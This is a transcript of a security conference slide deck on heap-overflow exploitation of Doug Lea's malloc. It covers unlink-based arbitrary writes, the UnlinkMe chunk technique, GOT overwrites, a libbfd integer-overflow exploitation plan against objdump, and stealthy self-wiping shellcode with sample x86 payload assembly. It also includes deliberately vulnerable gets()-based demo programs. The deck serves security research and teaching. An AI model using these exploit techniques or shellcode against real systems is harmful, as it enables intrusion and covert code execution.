using the magic against the magicianusing the magic against the magician nicolas waisman dsn...
TRANSCRIPT
![Page 1: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/1.jpg)
“Using the magic against the magicianUsing the magic against the magician”
Nicolas WaismanDSN Security, Inc
www.dsnsecurity.com
![Page 2: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/2.jpg)
Introduction
•Techniques to make heap overflow exploit more reliable
• Doug Lea’s malloc (<libc 2.3)
• Based on free’s unlink technique (see Reference [5])
• At the end, you will have a better idea about of how and when use serveral techniques that will help to make your exploit more reliable.
(Basic skills on heap overflow will help)
![Page 3: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/3.jpg)
p_size
size
fd
bk
… (data)
p_size
size
p_size
size
fd
bk
… (data)
p_size
size
allocatedchunk->
mem->
nextc->
freechunk->
mem->
nextc->
| P
Basic Chunk’s structure
![Page 4: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/4.jpg)
Chunks consolidation• Every time that free is called, the algorythm tries to consolidate the boundaries chunks• Two types:
- Forward Consolidation (Our chunk with next one)- Backward Consolidation (Our chunk with previous)
• Objetives: Minimizing Fragmentation
![Page 5: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/5.jpg)
Backward Consolidation
• Check if the previous chunk isn’t in use• Locate the pointer into the previous chunk and “unlink()” it• unlink(p - p->prev_sz)
![Page 6: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/6.jpg)
Backward Consolidation
p_size
size
fd
bk
… (data)
p_size
size
fd
bk
… (data)
1) !(p->size & PREV_INUSE)
PREV_INUSE
P
2) p = p – p->prevsz
P
3) unlink(p)
![Page 7: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/7.jpg)
Forward Consolidation
• Check if the next chunk isn’t in use. To do this, it has tocheck for flag PREV_INUSE of the next chunk of our next chunk (the 3rd chunk).• Locate a pointer into the next chunk and “unlink()” it• unlink(p+p->size)
![Page 8: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/8.jpg)
Forward Consolidation
p_size
size
fd
bk
… (data)
p_size
size
fd
bk
… (data)
1) n = p + p->sz
p_size
size
fd
bk
… (data)
P
N
2) !((n+n->size)->size & PREV_INUSE)
PREV_INUSE
3) unlink(n)
![Page 9: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/9.jpg)
Taking advantage of Chunks consolidation
• Changing malloc internal structure • Forcing free() to call unlink() with our modified chunk• Writing 4 arbitrary bytes (or more?) wherever we want
![Page 10: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/10.jpg)
Exploiting Backward consolidation
• Fake our prev_sz field (taking PREV_SIZE flag out), in order to make free() believe that our previous chunk is free• Fake our size field in order to point our previouschunk to our “fake” previous chunk. (p- p->prev_sz)• Finally, unlink() is triggered :D
(writing 4 arbitrary bytes in an arbitrary location)
![Page 11: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/11.jpg)
Taking advantage of Backward Consolidation
-4
-4 &~PREV_INUSE
SHIT
pointer - 12
shellcode_addr
p_size
size
fd
bk
… (data)
1) !(p->size & PREV_INUSE)
PREV_INUSE
P
2) p = p – p->prevsz
P
3) unlink(p)(pointer-12) = shellcod_addr)
![Page 12: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/12.jpg)
Exploiting Forward consolidation
• In Forward consolidation, we aren’t forced to overwrite the malloc structure of our buffer to be free()d• We could just overwrite the malloc structure of our next chunk or fake our own structures.• Fake the size of the “next” chunk (3rd chunk) of our “next chunk” (take the PREV_SIZE flag, so free() believe that our 2nd chunk is free)• Finally, unlink() is trigged in our “next” chunk
(writing 4 arbitrary bytes in a arbitrary location)
![Page 13: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/13.jpg)
Taking advantage of Forward Consolidation
SHIT & ~PREV_SIZE
-4
pointer - 12
shellcode_addr
… (data)
…
p_size
size
FD
BK
…(data)
…
1) n = p + p->sz
P
N
2) !((n+n->size)->size & PREV_INUSE)
3) unlink(n)
PREV_INUSE
![Page 14: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/14.jpg)
/* abo9.c * * specially crafted to feed your brain by [email protected] */ /* free(your mind) */
/* I'm not sure in what operating systems it can be done */
int main(int argv,char **argc) { char *pbuf1=(char*)malloc(256); char *pbuf2=(char*)malloc(256); gets(pbuf1); free(pbuf2); free(pbuf1); }
p_size
size
FD
BK
… (data)
…
p_size
size
FD
BK
…(data)
…
pbuf1
pbuf2
![Page 15: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/15.jpg)
“Reliable” exploit requirements
• Function’s Pointer address (GOT, ctors,etc)• Shellcode Address• etc (Specific Cases)
![Page 16: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/16.jpg)
• Harcorded Addresses (wtf do I come from Bs.As..?)• Information Leaking (ask [email protected])• jp’s UnlikeMe Chunk (Bonus Track)• Writing 8 bytes per free• Trigger as much free as possible• etc…
Some techniques that helps to get our address.
![Page 17: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/17.jpg)
• Technique to trigger our fake chunk when we cannot predictwhat part of our controlled buffer will be “free”• Using forward consolidation technique, our free will try to lookfor our “next” chunk, using the p->size that will be one of our -15, -19,etc, and this will take our “next” pointer to our craftedchunk that is on a relative address of the place that free hits.
Jp’s UnlinkMe Chunk technique
![Page 18: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/18.jpg)
jp’s UnlikeMe Chunk (Bonus Track)
-4 -4 FD BK -11 -15 -19 …((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE
(forward consolidation)
free()
![Page 19: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/19.jpg)
jp’s UnlikeMe Chunk (Bonus Track)/* from jp’s article in phrack 61 Ref[3] */#define SOMEOFFSET 5 + (rand() % (SZ-1))int main(void){ unsigned long *unlinkMe=
(unsigned long*)malloc(SZ*sizeof(unsigned long)); int i = 0; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = WHAT_2_WRITE; unlinkMe[i++] = WHERE_2_WRITE-8; for(;i<SZ;i++){ unlinkMe[i] = ((-(i-1) * 4) & ~IS_MMAP) | PREV_INUSE ; } free(unlinkMe+SOMEOFFSET); return 0;}
-4
-4
FD
BK
-11
-15
-19
…
![Page 20: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/20.jpg)
• Triggering forward and backward consolidation on the same free will allow us to write 8 arbitrary bytes in 2 different arbitraryposition. • As we saw before, backward consolidation use as a offset – p->prev_sz and forward consolidation + p->size.
Writing 8 bytes per free()
![Page 21: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/21.jpg)
• So, we need to put in our trigger chunk: -prev_sz: (1) offset to our crafted backward chunk -size: (2) offset to our crafted forward chunk.• And then, put our crafted backward and forward on: -bk chunk location: trigger chunk - (1) offset -fd chunk location: trigger chunk + (2) offset• Remember that our offset will be negative, so for example:
- bk chunk will be after our trigger chunk - fd chunk will be before our trigger chunk
Writing 8 bytes per free()
![Page 22: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/22.jpg)
Writing 8 bytes per free(double consolidation)
-4 -4 FD BK -16 -16 X X -4 -4 BK FD
free()
forward backward
trigger chunkforward chunk backward chunk
![Page 23: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/23.jpg)
• This is a trick to “discover” our shellcode location withoutknowing the address of the buffer where is.• We need to know the address of a function pointer (got,etc)• With our 8 bytes per free technique, on our first consolidation(backward) we write on our function ptr the address of functionptr + 4, on the second consolidation (forward), we write twoopcode (pop %eax, ret)
Writing 8 bytes per free(mixed with gera’s friendly function Ref[4])
![Page 24: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/24.jpg)
• Now… the next time our function pointer is called, we willdiscard the real “return address” and we will be jumping tothe function argument.
Writing 8 bytes per free(mixed with gera’s friendly function Ref[4])
![Page 25: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/25.jpg)
Writing 8 bytes per free
got[free] = got[free+4]got[free+4]= 0xbfff3c58 (pop %eax; ret)
int main(int argv,char **argc) { char *pbuf1=(char*)malloc(256); char *pbuf2=(char*)malloc(256); gets(pbuf1); free(pbuf2); free(pbuf1); }
-16
-16
backward chunk
… (data)
…
p_size
…
shellcode
forward chunk
pbuf1
pbuf2
\x3c\x58\xff\xbfpop %eaxret ( jmp pbuf1 )
(mixed with gera’s friendly function Ref[4])
![Page 26: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/26.jpg)
Writing 8 bytes per free(mixed with gera’s friendly function Ref[4])
got[free] = got[free+4]got[free+4]= 0xbfff3c58 (pop %eax; ret)
• Function pointer ??
• Shellcode location int main(int argv,char **argc) {
char *pbuf1=(char*)malloc(256); char *pbuf2=(char*)malloc(256); gets(pbuf1); free(pbuf2); free(pbuf1); }
\x3c\x58\xff\xbfpop %eaxret ( jmp pbuf1 )
![Page 27: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/27.jpg)
Writing 8 bytes per free(mixed with gera’s friendly function Ref[4])
int main(int argc, char **argv) { char *pbuf1=(char *)malloc(256); char *pbuf2=(char *)malloc(256); gets(pbuf1); free(pbuf2); snprintf(pbuf1, "HOLA",4);}
![Page 28: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/28.jpg)
Example: bug in libfd(steps to make it more reliable)
![Page 29: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/29.jpg)
BFD is a package which allows applications to use the same routines to operate on object files whatever the object file format.When an application sucessfully opens a target file (object, archive, etc), a pointer to an internal structure is returned.
Lib BFD
Note: I try many times to contact libfd developers, but I couldn’t.
![Page 30: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/30.jpg)
#include "bfd.h“unsigned int number_of_sections(abfd) bfd *abfd; {
return bfd_count_sections(abfd); }
Ejemplo de uso de Lib BFD
Return the amount of sections in a transparent waywithout knowing the object file format.
![Page 31: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/31.jpg)
Used by…
Most of binutils’s applications
• gdb
• objdump
• nm
• strip
• etc
![Page 32: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/32.jpg)
◊ Application binary format
◊ Available in most than 30 platform
◊ Used for 4 types of files:- Relocate Object Files- Executables- Dynamic Executables- Core dumps
What is ELF?
![Page 33: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/33.jpg)
Section Table
• Array of Section Headers• Gives us information about the different file’s section (got, .data, .code, .bss,etc)• Not necesary• strip – Delete sections from the file
![Page 34: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/34.jpg)
typedef struct{ Elf32_Word sh_name; Elf32_Word sh_type; Elf32_Word sh_flags; Elf32_Addr sh_addr; Elf32_Off sh_offset; Elf32_Word sh_size; Elf32_Word sh_link; Elf32_Word sh_info; Elf32_Word sh_addralign; Elf32_Word sh_entsize;} Elf32_Shdr;
Section size
Offset to section
![Page 35: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/35.jpg)
![Page 36: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/36.jpg)
bfd_elf_get_str_section ( bfd *abfd, unsigned int shindex) {
….
offset = i_shdrp[shindex]->sh_offset;
shstrtabsize = i_shdrp[shindex]->sh_size;
shstrtab = elf_read (abfd, offset, shstrtabsize);
i_shdrp[shindex]->contents = (PTR) shstrtab;
}
return shstrtab;
}
offset = sh_offsetshtstrtabsize= sh_size
![Page 37: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/37.jpg)
static char *elf_read (bfd *abfd; file_ptr offset; bfd_size_type size) {
char *buf;
if ((buf = bfd_alloc (abfd, size)) == NULL) return NULL;
if (bfd_seek (abfd, offset, SEEK_SET) != 0)
return NULL;
if (bfd_bread ((PTR) buf, size, abfd) != size){
if (bfd_get_error () != bfd_error_system_call)
bfd_set_error (bfd_error_file_truncated);
return NULL;
} return buf;
}
alloc
lseek
read file (fread)
![Page 38: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/38.jpg)
#define objalloc_alloc(o, l) \ __extension__ \ ({ struct objalloc *__o = (o); \ unsigned long __len = (l); \ if (__len == 0) \ __len = 1; \ __len = (__len + OBJALLOC_ALIGN - 1) &~ (OBJALLOC_ALIGN - 1); \ (__len <= __o->current_space \ ? (__o->current_ptr += __len, \ __o->current_space -= __len, \ (PTR) (__o->current_ptr - __len)) \ : _objalloc_alloc (__o, __len)); })
align
len= 0xffffffff OBJALLOC_ALIGN=0x4
(0xffffffff+3) == 0x2
0x2 &~ (3) == 0x0
![Page 39: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/39.jpg)
void
objalloc_free (struct objalloc *o) {
struct objalloc_chunk *l;
l = (struct objalloc_chunk *) o->chunks;
while (l != NULL) {
struct objalloc_chunk *next;
next = l->next;
free (l);
l = next;
}
free (o);
}
struct objalloc_chunk { struct objalloc_chunk *next; char *current_ptr;};
![Page 40: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/40.jpg)
Simple Exploit
SHELLCODE
…
CHUNK
ADDR2CHUNK
…
struct objalloc *o?
shellcode_addr ?function_p ?
?
![Page 41: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/41.jpg)
Lets take a break… enough! Time to think…
• Hardcorded addresses.
• unlinkMe chunk ?
• Trigger many free()s in order to write as much as possible.
![Page 42: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/42.jpg)
Backward Consolidation with “lchunk”
(triggering free’s)
-4
-4 &~PREV_INUSE
ADDR NEXT CHUNK
pointer - 12
shellcode_addr
p_size
size
fd
bk
… (data)
1) !(p->size & PREV_INUSE)
PREV_INUSE
P2) p = p – p->prevsz
P3) unlink(p)
(pointer-12) = shellcod_addr)free(l)
l->nextl->current_ptr
![Page 43: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/43.jpg)
Function pointer (got[free]):
• Lot of possiblities to hit it
• Targets of O.S.
• common got incremented by four
struct objalloc_o
• Raise the possiblity to hit it, adding 0x300 bytes of Addr to the first chunk
lchunk:
• Address first chunk: Relative to the beginning of the file
• Next lchunk: Relative to the beginning of the buffer (adding +sizeof(lchunk) to find the next contiguos lchunk)
![Page 44: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/44.jpg)
Lets put all togethershellcode
lchunk
…
lchunk
ADDRs 2 first lchunk
lchunk
…
lchunk
struct objalloc *o
shellcode_addr ?
function_p
next_lchunk
?
![Page 45: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/45.jpg)
Bonus II – Doing a nice shellcode (lacria’s shellcode)
• Exploiting an application to analize files• One shot• Make it the most stealth we can• Try not to mess up with the file analisis• No trace of shellcode existence
![Page 46: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/46.jpg)
Patching the Sectiontypedef struct{ Elf32_Word sh_name; Elf32_Word sh_type; Elf32_Word sh_flags; Elf32_Addr sh_addr; Elf32_Off sh_offset; Elf32_Word sh_size; Elf32_Word sh_link; Elf32_Word sh_info; Elf32_Word sh_addralign; Elf32_Word sh_entsize;} Elf32_Shdr;
Old values
![Page 47: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/47.jpg)
Wiping the shellcode
Original Application
shellcode
![Page 48: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/48.jpg)
Payload (infection, reverse connection,etc)push $0xa3f6569
push $0x62627574
push $0x656c6574
push $0x20756f79
push $0x20646944
xor %ebx,%ebx
inc %ebx
mov %esp,%ecx
mov $0x14,%edx
mov $0x4,%eax
int $0x80
![Page 49: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/49.jpg)
Re executing
… argc argv[] 0 envp[] 0/bin/
objdump-x … PWD=/home … /bin/objdump
execve(“/bin/objdump”, argv, envp)
stack_top
![Page 50: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/50.jpg)
any question?
![Page 51: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/51.jpg)
• [1] gera’s InsecureProgramming pagehttp://community.corest.com/~gera/InsecureProgramming/
• [2] LIB BFD, the Binary File Descriptor Libraryhttp://www.gnu.org/manual/bfd-2.9.1/html_mono/bfd.html
• [3] Advanced Doug Lea’s malloc exploits (jp)http://www.phrack.org/show.php?p=61&a=6
• [4] Advances in format string explotation (riq/gera)http://www.phrack.org/show.php?p=59&a=7
• [5] Vudo malloc tricks (MaXX)http://www.phrack.org/show.php?p=57&a=8
• [6] Linux libc sourceshttp://ftp.gnu.org/pub/gnu/glibc/glibc-2.2.5.tar.gz
References
![Page 52: Using the magic against the magicianUsing the magic against the magician Nicolas Waisman DSN Security, Inc](https://reader035.vdocument.in/reader035/viewer/2022062618/5513c98255034646298b4da0/html5/thumbnails/52.jpg)
GRACIAS(to Cristian, Augusto, Daemon, nahual, module, coca-cola, jp and lots of etcs)
Questions? Ideas? Flames?